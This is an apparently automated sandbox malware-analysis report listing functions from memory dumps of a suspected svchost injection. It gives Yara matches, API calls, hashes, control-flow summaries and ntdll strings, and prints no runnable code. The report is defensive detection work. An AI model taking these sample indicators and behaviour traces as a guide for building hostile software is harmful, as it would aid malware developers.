                                                                    • Opcode ID: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                                                    • Instruction ID: 477d092c06117334780cd49e62da7514cc2248fe399308c3f7817f4bebfa49c6
                                                                    • Opcode Fuzzy Hash: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                                                    • Instruction Fuzzy Hash: 87900261202404034105B6584454656400B87E4301B95C121E1014694EC66589916125
                                                                    Function 03672DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                                                    • Instruction ID: 6cebf13566ce982b6a45d412a60939e0e5e16a162780faa10336b83753f66aa7
                                                                    • Opcode Fuzzy Hash: 0c1941189cb1d193a099106bec33393777b3f246b878689b08df1d155923ecdd
                                                                    • Instruction Fuzzy Hash: 4490023120140813D111B6584544747000A87D4341FD5C512A042465CE97968A52A121
                                                                    Function 00418973 Relevance: .4, Instructions: 436COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2bd2c27febc2e795aef5fe79a39eed93aff8318f871cb94f3b365a2e95baed29
                                                                    • Instruction ID: b6059585b7ac115cb29b7646a4d83c05932fef0bbbbbdecf636e1fea8e1aad50
                                                                    • Opcode Fuzzy Hash: 2bd2c27febc2e795aef5fe79a39eed93aff8318f871cb94f3b365a2e95baed29
                                                                    • Instruction Fuzzy Hash: 8CF1A0B0D00219AFDB24DF95DC85AEEB7B9EF44304F1481AEE508A7341DB346A85CFA4
                                                                    Function 0041435E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(219X93M1i,00000111,00000000,00000000), ref: 0041442D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 219X93M1i$219X93M1i
                                                                    • API String ID: 1836367815-3254477705
                                                                    • Opcode ID: 98f82ed4ca568e302ef28ba5db88f4cf0699dfedf7adffc2e55b823ff9f62343
                                                                    • Instruction ID: 4a6f704cf9d56877a43ff63a277951f4b7e181716103be681189fd4bb0fd99d5
                                                                    • Opcode Fuzzy Hash: 98f82ed4ca568e302ef28ba5db88f4cf0699dfedf7adffc2e55b823ff9f62343
                                                                    • Instruction Fuzzy Hash: 24118471E40128BADB215F55DC02FDE7774AF81B18F048056FA00BF181D77899138BD4
                                                                    Function 004143B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 14 4143b1-4143d1 call 42e9d3 17 4143d7-41441e call 417b13 call 4048a3 call 425123 14->17 18 4143d2 call 42f3e3 14->18 25 414440-414445 17->25 26 414420-414431 PostThreadMessageW 17->26 18->17 26->25 27 414433-41443d 26->27 27->25
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(219X93M1i,00000111,00000000,00000000), ref: 0041442D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 219X93M1i$219X93M1i
                                                                    • API String ID: 1836367815-3254477705
                                                                    • Opcode ID: e2a9b0b8be536a47e96990ebef916508a260dae29269d2f45bdeff0813b6d183
                                                                    • Instruction ID: 0a5c10355216ae169af1ffe0a431c3f70178cbf46eb9e90c717c3930c8c0062f
                                                                    • Opcode Fuzzy Hash: e2a9b0b8be536a47e96990ebef916508a260dae29269d2f45bdeff0813b6d183
                                                                    • Instruction Fuzzy Hash: B001BE71E4125876DB11A6D2DC02FDF7B7C5F41B54F448056FA007B2C1D7B8560687E5
                                                                    Function 004143B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 28 4143b3-4143c3 29 4143cc-4143d1 28->29 30 4143c7 call 42e9d3 28->30 31 4143d7-41441e call 417b13 call 4048a3 call 425123 29->31 32 4143d2 call 42f3e3 29->32 30->29 39 414440-414445 31->39 40 414420-414431 PostThreadMessageW 31->40 32->31 40->39 41 414433-41443d 40->41 41->39
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(219X93M1i,00000111,00000000,00000000), ref: 0041442D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 219X93M1i$219X93M1i
                                                                    • API String ID: 1836367815-3254477705
                                                                    • Opcode ID: 87cf19260fd6d22e9e6f1971aa4e8694d241a98b1084c8469ade91ab927630aa
                                                                    • Instruction ID: 0a5c10355216ae169af1ffe0a431c3f70178cbf46eb9e90c717c3930c8c0062f
                                                                    • Opcode Fuzzy Hash: 87cf19260fd6d22e9e6f1971aa4e8694d241a98b1084c8469ade91ab927630aa
                                                                    • Instruction Fuzzy Hash: B001BE71E4125876DB11A6D2DC02FDF7B7C5F41B54F448056FA007B2C1D7B8560687E5
                                                                    Function 0042CC03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 42 42cc03-42cc44 call 404933 call 42dad3 RtlFreeHeap
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CC3F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: ^hA
                                                                    • API String ID: 3298025750-899435009
                                                                    • Opcode ID: d8e9f9b65c505428fa31cd0b99afee9846c1e7b800b5caa78de1bb6017ec91aa
                                                                    • Instruction ID: 8b68260a8c13e7e0b4932b651963294e285b36e57dcebbacc11e6a1c4950e5d1
                                                                    • Opcode Fuzzy Hash: d8e9f9b65c505428fa31cd0b99afee9846c1e7b800b5caa78de1bb6017ec91aa
                                                                    • Instruction Fuzzy Hash: 5AE092B22042047BD610EE99EC41FDF77ACEFC5714F00401AFA08A7241CA70BD108BB8
                                                                    Function 00417B08 Relevance: 1.5, APIs: 1, Instructions: 40libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 252 417b08-417b0c 253 417b6d-417b71 252->253 254 417b0e-417b3c call 42f633 252->254 256 417b73-417b87 LdrLoadDll 253->256 257 417b8a-417b8d 253->257 259 417b42-417b50 call 42fc33 254->259 260 417b3e-417b41 254->260 256->257 263 417b60-417b71 call 42dfc3 259->263 264 417b52-417b5d call 42fed3 259->264 263->256 263->257 264->263
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B85
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 6d77bacdb1d3529f7168cc01b32e97690413d3805374c4ced6db3b9f3292659f
                                                                    • Instruction ID: db838830992d774e402df73c0e29cb94e8f3590b8b0806af232228afe9d0b077
                                                                    • Opcode Fuzzy Hash: 6d77bacdb1d3529f7168cc01b32e97690413d3805374c4ced6db3b9f3292659f
                                                                    • Instruction Fuzzy Hash: 8BF06275A4820EABDB10CE94C982FEDF774EB54718F004296E94D97251F234BB868B54
                                                                    Function 0042CBB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 269 42cbb3-42cbf4 call 404933 call 42dad3 RtlAllocateHeap
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,0041E87B,?,?,00000000,?,0041E87B,?,?,?), ref: 0042CBEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: a2d1c1114e2154a02eda434241ce3d9bf25bbb63547ebc5a5ed90d751d7a697d
                                                                    • Instruction ID: 76dc2f42b177e8efe1491005533ee4e8695d5755ec796e6255ec964f524093dc
                                                                    • Opcode Fuzzy Hash: a2d1c1114e2154a02eda434241ce3d9bf25bbb63547ebc5a5ed90d751d7a697d
                                                                    • Instruction Fuzzy Hash: 3FE092B26042087BD614EE59DC41FDF77ACEFC5714F000019F908A7241C670B91087B4
                                                                    Function 0042CC53 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,01329089,?,00000001,01329089), ref: 0042CC84
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: 073cecbdc714fa7762aa08921c200e9025baadf4795940d5e955c1bb652d572d
                                                                    • Instruction ID: 9617bdd5385ee0389bc335b627765e0937a889653405dc2cdf97d2af73da0d99
                                                                    • Opcode Fuzzy Hash: 073cecbdc714fa7762aa08921c200e9025baadf4795940d5e955c1bb652d572d
                                                                    • Instruction Fuzzy Hash: 56E08C762042187FC220EA6ADC42FDB776CDFC5724F00446AFA48AB242C7B0B90187F4
                                                                    Function 03672C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                                                    • Instruction ID: 8879c64833d99df56973c153897a30f1d1648756cce15cdd82e5853e14c7e5b8
                                                                    • Opcode Fuzzy Hash: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                                                    • Instruction Fuzzy Hash: B4B09B719015C5C5DA51F7604708717790567D1701F59C561D3030755F4779C1D1E175

                                                                    Non-executed Functions

                                                                    Function 036B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2160512332
                                                                    • Opcode ID: 37b12cec14bd1b1e05cd17cd46f08cae87ef28e74e10486562a68b379ed6b726
                                                                    • Instruction ID: 579dbb5c965ea333aca3dc55a386f555582a637ebc135a81a8874d41969481f9
                                                                    • Opcode Fuzzy Hash: 37b12cec14bd1b1e05cd17cd46f08cae87ef28e74e10486562a68b379ed6b726
                                                                    • Instruction Fuzzy Hash: 56929975608341ABD720DE24C890BABB7F8BB88754F184D2DFA949B350D770E885CF96
                                                                    Function 036268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-3089669407
                                                                    • Opcode ID: 460f89aef6cec8c33ae17b34ddeb96396b67d5c8f14a3744fd1f13cb21fb8456
                                                                    • Instruction ID: fe5cc9c18bd150f53253cd5fdb831e2684913840c2a20cfe30ccc87c1fa21018
                                                                    • Opcode Fuzzy Hash: 460f89aef6cec8c33ae17b34ddeb96396b67d5c8f14a3744fd1f13cb21fb8456
                                                                    • Instruction Fuzzy Hash: 168122B2D01618AF8B22FB98DDC5DEFB7FDAB15610B054525FA01FB104E724ED148BA0
                                                                    Function 03668620 Relevance: 19.0, Strings: 15, Instructions: 223COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • 8, xrefs: 036A52E3
                                                                    • Invalid debug info address of this critical section, xrefs: 036A54B6
                                                                    • double initialized or corrupted critical section, xrefs: 036A5508
                                                                    • corrupted critical section, xrefs: 036A54C2
                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 036A5543
                                                                    • Critical section debug info address, xrefs: 036A541F, 036A552E
                                                                    • Critical section address, xrefs: 036A5425, 036A54BC, 036A5534
                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54CE
                                                                    • Critical section address., xrefs: 036A5502
                                                                    • undeleted critical section in freed memory, xrefs: 036A542B
                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A540A, 036A5496, 036A5519
                                                                    • IrwIrw@4rw@4rw, xrefs: 036A5341, 036A534D
                                                                    • Address of the debug info found in the active list., xrefs: 036A54AE, 036A54FA
                                                                    • Thread identifier, xrefs: 036A553A
                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54E2
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$IrwIrw@4rw@4rw
                                                                    • API String ID: 0-3353328696
                                                                    • Opcode ID: 901b5db5c862ce80c417aeb69ce44e4ca8714589b9262d274409f882408629be
                                                                    • Instruction ID: 45aac73e284e222e6b6ce09a7945f23b09bfe3a2b8026c3149431584cb2a7b77
                                                                    • Opcode Fuzzy Hash: 901b5db5c862ce80c417aeb69ce44e4ca8714589b9262d274409f882408629be
                                                                    • Instruction Fuzzy Hash: E6819DB0A00758EFDB20CF98C941BAEBBB9FB49710F184159F659BB241D375A941CF60
                                                                    Function 03660F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                    • API String ID: 0-360209818
                                                                    • Opcode ID: f4dfd7bb96a89510cd5b72e45abd8ec5ac1ead5eabd1846bb1ff43badfb92782
                                                                    • Instruction ID: e17fecd882923972afb8290998e97f09edcb071017f5b709de10eee5121f10f8
                                                                    • Opcode Fuzzy Hash: f4dfd7bb96a89510cd5b72e45abd8ec5ac1ead5eabd1846bb1ff43badfb92782
                                                                    • Instruction Fuzzy Hash: 06628FB5E006298FDB24CF18C9417A9B7B6EF96310F5882DAD449AB340D7729EE1CF50
                                                                    Function 036E12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                    • API String ID: 0-3591852110
                                                                    • Opcode ID: c649eca0ecb7d5d24c71e40f20c9db7ea8caae3da64fca9e55583e340940f5c1
                                                                    • Instruction ID: c7e5ab7149c905e8582025eb4fa73cd6962cf932f39ae9c2765d505d8e99d2cb
                                                                    • Opcode Fuzzy Hash: c649eca0ecb7d5d24c71e40f20c9db7ea8caae3da64fca9e55583e340940f5c1
                                                                    • Instruction Fuzzy Hash: C012CC74601642DFCB25CF28C545BBABBF5FF0A704F188459E4968B782D734E889EB60
                                                                    Function 0364AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-3197712848
                                                                    • Opcode ID: 1ac064034c0d2c80aa3e91ff19a6cd1f59df3e96e3de8cb2fb1390c52900c032
                                                                    • Instruction ID: 795c46e2df0cc8f555d5d447516d9f282f181ef251fdc5b1e61611109ce8c171
                                                                    • Opcode Fuzzy Hash: 1ac064034c0d2c80aa3e91ff19a6cd1f59df3e96e3de8cb2fb1390c52900c032
                                                                    • Instruction Fuzzy Hash: 4512FE71A083419FD724DF68C940BAAB7E8BF85B04F08496EF8C58B381E774D945CB92
                                                                    Function 0362D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                    • API String ID: 0-3532704233
                                                                    • Opcode ID: 2fa499dab1739731274f3664558fec01f46db9498b3d81da4fb0a6d67204d1bb
                                                                    • Instruction ID: 3889651b34ef4b7b7e461938dcb844dcc8261e10efd52513ff04f19d353db04f
                                                                    • Opcode Fuzzy Hash: 2fa499dab1739731274f3664558fec01f46db9498b3d81da4fb0a6d67204d1bb
                                                                    • Instruction Fuzzy Hash: A9B1BD715087619FC721EF64C580A6BBBE8AF88744F06492EF899E7340D770D949CFA2
                                                                    Function 036E0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                    • API String ID: 0-1357697941
                                                                    • Opcode ID: 103acd7d7ec564acf7d07e89c136e36fe58558bf3d77339d6da66afacafab9e4
                                                                    • Instruction ID: f9960eacd882f8698372767dc80e4e0f065a5b28fd14e252291b0af2dddba3c6
                                                                    • Opcode Fuzzy Hash: 103acd7d7ec564acf7d07e89c136e36fe58558bf3d77339d6da66afacafab9e4
                                                                    • Instruction Fuzzy Hash: 2BF11435A05655EFCB25CF6AC440BAAFBF5FF0A704F088059E4929B382C7B4A949DF50
                                                                    Function 036C9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                    • API String ID: 0-3063724069
                                                                    • Opcode ID: 7a9e26e6a5c68c2af10545e8cdc4c39cac6eb79fe9788ca00ff0ba153189ebfc
                                                                    • Instruction ID: 61ce727a3c23c3f364e3a98415374876f01d044730021300aec43b057caf5ffa
                                                                    • Opcode Fuzzy Hash: 7a9e26e6a5c68c2af10545e8cdc4c39cac6eb79fe9788ca00ff0ba153189ebfc
                                                                    • Instruction Fuzzy Hash: 79D1E372814395AFE721DB64C840BBFBBE8EF84714F48492DFA849B250D770D914CB96
                                                                    Function 036E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                    • API String ID: 0-1700792311
                                                                    • Opcode ID: f2a5523afdce4ce977b8cd870b31103a34b0afbc92692948a2e92e7ef25879c5
                                                                    • Instruction ID: f0164e6b87c13e6c750d619c1bac27a5e9d3dd3b5db1fc0d2d676a67cefd902a
                                                                    • Opcode Fuzzy Hash: f2a5523afdce4ce977b8cd870b31103a34b0afbc92692948a2e92e7ef25879c5
                                                                    • Instruction Fuzzy Hash: A2D1DC39A01A81DFCB22DF6AC540AAEBBF1FF4A710F198049E4559F352C7B49949CF18
                                                                    Function 0362D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0362D0CF
                                                                    • Control Panel\Desktop\LanguageConfiguration, xrefs: 0362D196
                                                                    • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0362D146
                                                                    • @, xrefs: 0362D2AF
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0362D2C3
                                                                    • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0362D262
                                                                    • @, xrefs: 0362D0FD
                                                                    • @, xrefs: 0362D313
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_3600000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                    • API String ID: 0-1356375266
                                                                    • Opcode ID: 72e69bebd7e70c3fd46cb39334945dfd6b6de61d69092ec852a43d40fe452e05
                                                                    • Instruction ID: cb85851827e826fcad21753db50097ac4547b48c8a4419d4333d8fff569c9925
                                                                    • Opcode Fuzzy Hash: 72e69bebd7e70c3fd46cb39334945dfd6b6de61d69092ec852a43d40fe452e05
                                                                    • Instruction Fuzzy Hash: CFA1BD719087159FD321DF20C584BABBBE8BB88715F014D2EFAA896240E774D908CF97
                                                                    Function 03649EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • sxsisol_SearchActCtxForDllName, xrefs: 036976DD
                                                                    • @, xrefs: 03649EE7
                                                                    • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 036976EE
                                                                    • minkernel\ntdll\sxsisol.cpp, xrefs: 03697713, 036978A4
                                                                    • Internal error check failed, xrefs: 03697718, 036978A9
                                                                    • Status != STATUS_NOT_FOUND, xrefs: 0369789A
                                                                    • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03697709
